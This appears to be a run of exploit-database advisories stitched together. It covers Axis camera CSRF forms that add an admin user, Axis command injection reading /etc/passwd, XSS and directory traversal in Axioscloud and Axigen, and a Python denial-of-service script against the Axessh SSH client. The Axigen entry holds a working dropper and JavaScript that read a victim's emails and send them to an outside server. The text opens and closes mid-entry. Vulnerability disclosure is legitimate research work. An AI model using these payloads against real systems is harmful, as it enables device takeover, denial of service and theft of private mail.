<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="user" value="SmithW" />
<input type="hidden" name="sgrp"
value="viewer:operator:admin:ptz" />
<input type="hidden" name="pwd" value="W!nst0n" />
<input type="hidden" name="grp" value="users" />
<input type="hidden" name="comment" value="WebUser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#-> Deleting an app via directly CSRF (axis_update.shtml)
http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
"></script>
[And many acitions allowed to an user [all of them?] can be forged in this
way]
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
Well, this is a very old design problem of this kind of device, nothing new
to say about that.
Credits
=======
These vulnerabilities has been discovered and published by Orwelllabs.
Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
_ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
www.orwelllabs.com
security advisory
olsa-2015-8257
PGP: 79A6CCC0
* Advisory Information
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
(+) Title: AXIS Multiple Products Authenticated Remote Command Execution via devtools vector
(+) Vendor: AXIS Communications
(+) Research and Advisory: Orwelllabs
(+) Advisory URL: http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html
(+) Class: Improper Input Validation [CWE-20]
(+) CVE Name: CVE-2015-8257
(+) Remotely Exploitable: Yes
(+) Locally Exploitable: No
(+) OLSA-ID: OWLL2015-8257
(+) Affected Versions: Multiple Products/Firmwares (check the list bellow)
(+) IoT Attack Surface: Device Administrative Interface/Authentication/Authorization
(+) Owasp IoTTop10: I1, I2
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerability
+++++++++++++
AXIS Network Cameras (various models/firmwares) are prone to Authenticated remote
command execution vulnerability. Exploiting this vulnerability a remote attacker can
force the execution of certain unauthorized actions, which may lead to further attacks.
Technical Details
+++++++++++++++++
The devtools.sh script is the responsible for vulnerability and it's 4 attack vectors through the following pages:
http://xxx.xxx.xxx.xxx/app_license.shtml?app=
http://xxx.xxx.xxx.xxx/app_license_custom.shtml?app=
http://xxx.xxx.xxx.xxx/app_index.shtml?app=
http://xxx.xxx.xxx.xxx/app_params.shtml?app=
An attacker can use the app parameter that waits for the name of a
legitimate application to inject commands in the operating system using
"%3B", for example, to read the contents of /etc/passwd:
http: //
xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd
The data entered in parameter "app =" is passed without any treatment for
devtools.sh script located at: {HTMLROOL}/bin/devtools.sh
This script contains several functions, namely:
list()
status()
menulist()
mainpagelink()
SETTINGSLINK()
confvariable()
echo_ssivar_licensekey()
load_auto_inst_form()
When these functions are invoked, they interact with the parameters passed
by the web application through
the affected scripts (e.g. ap_license.shtml? App =). By injecting the code
below:
http: //
xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd
The value passed in "app" will be passed directly to the script invoking
devtools.sh via shell -c as shown in the listing process below (third line
invoking confvariable function):
[SNIP]
2039 led 25472 S /usr/bin/enldgts -n
12014 root 0 SW [kworker/0:0]
13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh
confvariable ORW..
13183 root 2728 R ps -aux PACKAGENAME
13312 root 0 SW [kworker/3:1]
13320 root 0 SW [kworker/2:0]
[SNIP]
The value "ORWELLLABS%3Bcat%20/etc/passwd" is then passed on to the
corresponding function (after passing through a conference on "confvariable
()").
confvariable() {
local val=
if [ -r "$PACKAGE_DIRECTORY/$1/$ADPPACKCFG" ]; then
. "$PACKAGE_DIRECTORY/$1/$ADPPACKCFG" || :
eval val=\$$2
echo $val
fi
}
Then enter the function "menulist ()" which we see the main stretch located
between the lines 127 and 143:
[SNIP]
127 [ "$ name", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ activeMenu1 = $ APPNAME" -> true <! - # Else - -> false <! - #
endif ->, null,
128 [
129 [ "Settings", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = param_ $ APPNAME" -> true <! - # Else - -> false
<! - # endif ->, null, []],
130 EOF
131 if [-z "$ LICENSEPAGE"] || [ "$ LICENSEPAGE" axis =]; Then
132 cat << - EOF
133 [ "License", "/app_license.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = license_ $ APPNAME" -> true <! - # Else - -> false
<! - # endif ->, null, []],
134 EOF
135 fi
136 if [ "$ LICENSEPAGE" = custom] && [-r "$ HTMLROOT / local / $ APPNAME /
license.inc"]; Then
137 cat << - EOF
138 [ "License", "/app_license_custom.shtml", "app = $ APPNAME &" hostA, <!
- # If expr = "\ $ ActivePage custom_ = $ APP NAME" -> true <! - # Else ->
false <! - # endif ->, null, []],
139 EOF
140 fi
141 if [-r "$ HTMLROOT / local / $ APPNAME / about.inc"]; Then
142 cat << - EOF
143 [ "About", "/app_index.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = $ APPNAME" -> true <! - # Else - > false <! - #
endif ->, null, []],
Where the important lines are the menus below:
/bin/devtools.sh (127):
[ "$ Name", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If expr
= "\ $ activeMenu1 = $ APPNAME" -> true -> false <! - #endif ->, null,
/bin/devtools.sh (129):
[ "Settings", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = param_ -> true <! - # Else -> false < ! - # endif
->, null, []],
/bin/devtools.sh (133):
[ "License", "/app_license.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = License" -> true <! - # Else -> false <! - # endif
->, null, []],
/bin/devtools.sh (138):
[ "License", "/app_license_custom.shtml", "app = $ APPNAME &" hostA, <! - #
If expr = "\ $ ActivePage = APPNAME" -> true <! - # Else -> false <! - #
endif ->, null, []],
/bin/devtools.sh (143):
[ "About", "/app_index.shtml", "app = $ APPNAME &" hostA, <! - # If expr =
"\ $ ActivePage = $ APPNAME" - # else -> false <! - # endif ->, null, []],
In PoC presented above, the payload will be triggered in line vector 133 of
devtools script ( "License" menu) that will:
[ "License", "/app_license.shtml", "app = ORWELLLABS% 3Bcat% 20
/etc/passwd& "HostA, <! - # If expr =" \ $ ActivePage = License "-> true <!
- # Else -> false <! - # Endif ->, null, []],
And when executed echoes the results on the page.
Impact
++++++
The impact of this vulnerability is that taking into account the busybox
that runs behind (and with root privileges everywhere. in all the binaries
and scripts) is possible to execute arbitrary commands, create backdoors,
performing a reverse connection to the machine attacker, use this devices
as botnets and DDoS amplification methods... the limit is the creativity of
the attacker.
Affected Products
+++++++++++++++++
Multiple Axis Communications Products/Firmware including:
* AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera -
Firmware 5.41.1.4
* AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera -
Firmware 5.70.1.2
* AXIS A8004-VE Network Video Door Station -
Firmware 5.85.1.1
* AXIS P3384 fixed dome Network camera -
Firmware 6.10.1
* AXIS P5532-E PTZ Dome Network Camera -
Firmware 5.41.3.1
* AXIS Q60-E Network Dome PTZ -
Firmware 5.65.1.1, 5.41.*, 5.70.1.1
* AXIS Q7401 Video Encoder -
Firmware 5.50.4
* AXIS Q7404 Video Encoder -
Firmware 5.50.4.*
* AXIS Q7406 Blade Video Encoder -
Firmware 5.51.2
* AXIS Q7411 Video Encoder -
Firmware 5.90.1
* AXIS Q7414 Blade Video Encoder -
Firmware 5.51.2
* AXIS Q7424-R Video Encoder -
Firmware 5.50.4
* AXIS Q7424-R Mk II Video Encoder -
Firmware 5.51.3
* AXIS Q7436 Blade Video Encoder -
Firmware 5.90.1
The list bellow shows the firmwares affected (and probably these firmwares
are not available anymore, but just the last version of them, if you not
sure, check the hash). All these firmwares (in the second column) has the
same "devtools.sh" shellscript (responsible for trigger the RCE
vulnerability) embedded. The script can be found on directory:
"{HTMLROOT}/bin/devtools.sh".
========================================================================
PRODUCT FIRMWARE FIRMWARE HASH
========================================================================
AXIS A8004-VE 5.85.1.1 e666578d7fca54a7db0917839187cd1a
AXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d
AXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10
AXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921
AXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7
AXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12
AXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12
AXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e
AXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841
AXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841
AXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a
AXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928
AXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928
AXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b
AXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b
AXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7
AXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7
AXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866
AXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65
AXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811
AXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e
AXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70
AXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7
AXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b
AXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6
AXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d
AXIS M3027 5.75.1.1 6d377ea9ea99068e910b416ccc73d8ca
AXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509
AXIS M3113-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61
AXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61
AXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205
AXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205
AXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d
AXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7
AXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d
AXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979
AXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866
AXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866
AXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866
AXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60
AXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60
AXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939
AXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969
AXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb
AXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03
AXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad
AXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f
AXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d
AXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6
AXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af
AXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba
AXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c
AXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea
AXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474
AXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4
AXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4
AXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6
AXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6
AXIS P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56
AXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a
AXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532
AXIS P3344 5.40.9.8 dd752099f8b2c48b91914ec32484f532
AXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476
AXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864
AXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b
AXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e
AXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e
AXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2
AXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00
AXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d
AXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be
AXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be
AXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892
AXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee
AXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee
AXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc
AXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749
AXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271
AXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8
AXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727
AXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106
AXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0
AXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698
AXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611
AXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf
AXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52
AXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e
AXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313
AXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188
AXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1
AXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1
AXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81
AXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863
AXIS P8514 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1755 5.50.4.1 6ca8597f48ed122ce84c2172c079cdf9
AXIS Q1765-LE 5.90.1.1 7930bf5c4c947f2f948f8b7475f01409
AXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1
AXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83
AXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0
AXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd
AXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4
AXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49
AXIS Q1931-E-PT-Mount5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9
AXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1
AXIS Q1932-E PT.Mount5.75.1 513fc031f85542548eeccfeaa7c1a29e
AXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688
AXIS Q2901-E PT.Mount5.55.4.1 a41aed45359f11d2ec248419c124a52d
AXIS Q3505 5.80.1.4 9394b3577bdb17cb9f74e56433a0e660
AXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3
AXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de
AXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104
AXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506
AXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b
AXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47
AXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb
AXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026
AXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d
AXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53
AXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253
AXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766
AXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da
AXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501
AXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd
AXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1
AXIS Q6044-C 5.70.1.1 dc3fc472b88e07278e6ff82eaee71a8d
AXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928
AXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d
AXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce
AXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6
AXIS Q6045-C-MkII 5.70.1.1 2c9efccb0fba0e63fc4fff73e6ba0fea
AXIS Q6045-E 5.70.1.2 321a5d906863787fdc5e34483e6ec2a8
AXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d
AXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741
AXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746
AXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b
AXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148
AXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5
AXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f
AXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5
AXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d
AXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0
AXIS Q7406 5.51.2 3cdb7935278157b9c91c334613012b1e
AXIS Q7411 5.90.1 26893adedcfc1953829084e8e7c3fbdd
AXIS Q7414 5.51.2 8ff659a8db077b545205f56dfef217d4
AXIS Q7424-R 5.50.4 d570ef1886c84ab53934fc51385e8aa7
AXIS Q7424-R-MkII 5.51.3 964a13f6b1aef17562cbbde11d936dee
AXIS Q7436 5.90.1 8fe1ef95b231bf6f771c3edc0fbc8afd
AXIS Q8414-LVS 6.10.1 9529cd9cf3b3bd66bec22c0b1c7448cd
AXIS Q8631-E 5.75.1 c7f882afc268ca3d60d07d5770db6a51
AXIS Q8632-E 5.75.1 f01d9a86d21335fe3d78e634858b9e77
AXIS Q8665-LE 5.90.1.1 1549b56d34250a93bbcf7b24b4f63699
AXIS V5915 5.75.1.1 a1c39a9cd545091825001a831d0c1ea4
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the Vendor, tickets was opened to correct this issue.
Credits
+++++++
These vulnerabilities has been discovered and published by Orwelllabs.
Timeline
++++++++
2015-09-10: First attempt to contact Vendor
2015-10-30: Vulnerability was reported to CERT
2015-11-30: CVE-IDs are assigned
2016-07-25: Since the first vulnerability was published (09.04.2016 -
EDB-ID: 39683)
a long conversation revolved around these vulnerabilities with the
manufacturer.
We maintained communication since 15/04/2016 until now.
As there is still disagreement regarding vulnerabilities (and botnets in
the wild: https://goo.gl/k79I8u),
we thought it good to publish this advisory, since it has already exhausted
all deadlines.
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
++++++++++++++++
# Loadind k4fK43sQu3 m0dule...
# Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
# Dork: n/a
# Date: 2018-10-11
# Exploit Author: Dino Barlattani
# Vendor Homepage: http://axiositalia.it/
# Software Link: http://axiositalia.it/?page_id=1907
# Version: 1.7.0/7.0.0
# Category: Webapps
# Platform: ASPX
# CVE: N/A
# POC:
# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=
source: https://www.securityfocus.com/bid/56343/info
Axigen Mail Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied data.
A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to obtain sensitive information, cause a denial of service condition, or execute arbitrary code with the privileges of the application. This could help the attacker launch further attacks.
http://www.example.com/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting
# Date: 2023-09-25
# Exploit Author: Vinnie McRae - RedTeamer IT Security
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.7) and older version of Axigen WebMail
# Tested on: firefox, chrome
# CVE: CVE-2023-48974
Description
The `serverName_input` parameter is vulnerable to stored cross-site
scripting (XSS) due to unsanitized or unfiltered processing. This means
that an attacker can inject malicious code into this parameter, which will
then be executed by other users when they view the page where the parameter
is used. This is affecting authenticated administrators, and the attack can
be used to attack other administrators with more permissions.
Exploitation
1. Login as administrator
2. Navigate to "global settings"
3. Change server name to <script>alert(1)</script>
PoC of the POST request:
```
POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1
Host: localhost:9443
Cookie: eula=true;
WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D;
webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true;
public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52;
menuLeftTopPosition=-754
Content-Type: multipart/form-data;
boundary=---------------------------41639384187581032291088896642
Content-Length: 12401
Connection: close
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="serverName_input"
<script>alert(1)</script>
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="primary_domain_input"
axigen
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="ssl_random_file_input"
--SNIP--
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="update"
Save Configuration
-----------------------------41639384187581032291088896642--
```
#______________________________
#Vinnie McRae
#RedTeamer IT Security
#Blog: redteamer.de/blog-beitrag/
# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
# Google Dork: inurl:passwordexpired=yes
# Date: 2023-08-21
# Exploit Author: AmirZargham
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.0–4370c946) and older version of Axigen WebMail
# Tested on: firefox,chrome
# CVE: CVE-2022-31470
Exploit
We use the second Reflected XSS to exploit this vulnerability, create a
malicious link, and steal user emails.
Dropper code
This dropper code, loads and executes JavaScript exploit code from a remote
server.
');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
document.body.appendChild(x)
})//
Encoded form
/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//
Exploit code
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');
xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
if (xhr1.readyState === XMLHttpRequest.DONE) {
_h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
xhr2.setRequestHeader('Content-Type', 'application/json');
xhr2.onreadystatechange = () => {
if (xhr2.readyState === XMLHttpRequest.DONE) {
if (xhr2.status === 401){
script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
document.body.appendChild(script_tag);
} else {
resp = xhr2.responseText;
folderId = JSON.parse(resp)["mails"][0]["folderId"];
xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
xhr3.onreadystatechange = () => {
if (xhr3.readyState === XMLHttpRequest.DONE) {
emails = xhr3.responseText;
script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
document.body.appendChild(script_tag);
}
};
xhr3.send();
}
}
};
var body = JSON.stringify({isUnread: false});
xhr2.send(body);
}
};
xhr1.send();
Combining dropper and exploit
You can host the exploit code somewhere and then address it in the dropper
code.
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
============
www.labf.com
Product:
=============
Axessh 4.2.2
Axessh is a SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh without
sacrificing any of existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own cryptographic software).
2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested port forwarding
Vulnerability Type:
====================
Denial Of Service
AxeSSH will crash after receiving a overly long payload of junk...
Exploit code(s):
===============
1) Open the settings window for axessh and choose Run then click Run as EXE, this will launch "xwpsshd.exe"
crashes with bad protocol version.
import socket
print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"
ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
# Title: Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow
# Date: May 23rd, 2019
# Author: Uday Mittal (https://github.com/yaksas443/YaksasCSC-Lab/)
# Vendor Homepage: http://www.labf.com
